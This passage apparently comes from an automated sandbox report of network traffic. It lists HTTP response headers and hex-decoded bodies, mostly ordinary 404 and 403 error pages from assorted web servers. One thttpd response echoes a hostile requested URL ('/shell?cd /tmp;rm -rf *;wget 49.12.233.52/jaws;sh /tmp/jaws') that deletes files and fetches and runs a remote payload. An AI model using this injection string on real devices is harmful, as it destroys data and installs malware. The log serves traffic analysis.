HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:10 GMTServer: Apache/2.4.51 (Raspbian)Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadContent-Length: 273Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 52 61 73 70 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Raspbian) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:10:10 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:13 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 10:50:27 GMTServer: cisco-IOSConnection: closeAccept-Ranges: noneData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a Data Ascii: 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 13:09:03 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:21:35 GMTServer: Apache/2.2.22 (Win32) mod_jk/1.2.37Content-Length: 1229Cache-Control: max-age=3600Expires: Mon, 01 Nov 2021 09:22:05 GMTVary: Accept-EncodingKeep-Alive: timeout=5, max=150Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 21 2d 2d 20 54 68 65 20 61 62 6f 76 65 20 33 20 6d 65 74 61 20 74 61 67 73 20 2a 6d 75 73 74 2a 20 63 6f 6d 65 20 66 69 72 73 74 20 69 6e 20 74 68 65 20 68 65 61 64 3b 20 61 6e 79 20 6f 74 68 65 72 20 68 65 61 64 20 63 6f 6e 74 65 6e 74 20 6d 75 73 74 20 63 6f 6d 65 20 2a 61 66 74 65 72 2a 20 74 68 65 73 65 20 74 61 67 73 20 2d 2d 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 50 61 67 65 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 66 6f 6e 74 20 2d 2d 3e 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 37 30 30 2c 39 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 21 2d 2d 20 43 75 73 74 6f 6d 20 73 74 6c 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 21 2d 2d 20 48 54 4d 4c 35 20 73 68 69 6d 20 61 6e 64 20 52 65 73 70 6f 6e 64 2e 6a 73 20 66 6f 72 20 49 45 38 20 73 75 70 70 6f 72 74 20 6f 66 20 48 54 4d 4c 35 20 65 6c 65 6d 65 6e 74 73 20 61 6e 64 20 6d 65 64 69 61 20 71 75 65 72 69 65 73 20 2d 2d 3e 0d 0a 09 3c 21 2d 2d 20 57 41 52 4e 49 4e 47 3a 20 52 65 73 70 6f 6e 64 2e 6a 73 20 64 6f 65 73 6e 27 74 20 77 6f 72 6b 20 69 66 20 79 6f 75 20 76 69 65 77 20 74 68 65 20 70 61 67 65 20 76 69 61 20 66 69 6c 65 3a 2f 2f 20 2d 2d 3e 0d 0a 09 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 09 09 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 33 2f 68 74 6d 6c 35 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 72 65 73 70 6f 6e 64 2f 31 2e 34 2e 32 2f 72 65 73 70 6f 6e 64 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:10:17 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: thttpd/2.25b 29dec2003Content-Type: text/html; charset=euc-krDate: Mon, 01 Nov 2021 09:10:17 GMTLast-Modified: Mon, 01 Nov 2021 09:10:17 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 34 39 2e 31 32 2e 32 33 33 2e 35 32 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 27 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>404 Not Found</H2>The requested URL '/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws' was not found on this server.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.25b 29dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:18 GMTServer: ApacheAccept-Ranges: bytesKeep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:14:52 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 1725Content-Type: text/html; charset=utf-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:10:21 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service Unavailable: Back-end server is at capacityContent-Length: 0Connection: Close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.6.2Date: Mon, 01 Nov 2021 09:10:21 GMTContent-Type: text/htmlContent-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.6.2</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheServer: WebServerContent-Type: text/htmlContent-Length: 345Date: Mon, 01 Nov 2021 09:10:21 GMTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 14:40:21 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:05:39 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 148Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 53 6f 72 72 79 21 3c 2f 68 31 3e 3c 6c 61 62 65 6c 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 64 61 72 6b 73 6c 61 74 65 67 72 65 79 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 63 75 72 73 69 76 65 3b 22 3e 4e 54 68 65 20 70 61 67 65 20 79 6f 75 20 77 65 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e 3c 2f 6c 61 62 65 6c 3e 3c 2f 63 65 6e 74 65 72 3e Data Ascii: <center><h1>Sorry!</h1><label style="color: darkslategrey;font-family: cursive;">NThe page you were looking for could not be found.</label></center>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:23 GMTServer: ApacheContent-Length: 255Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 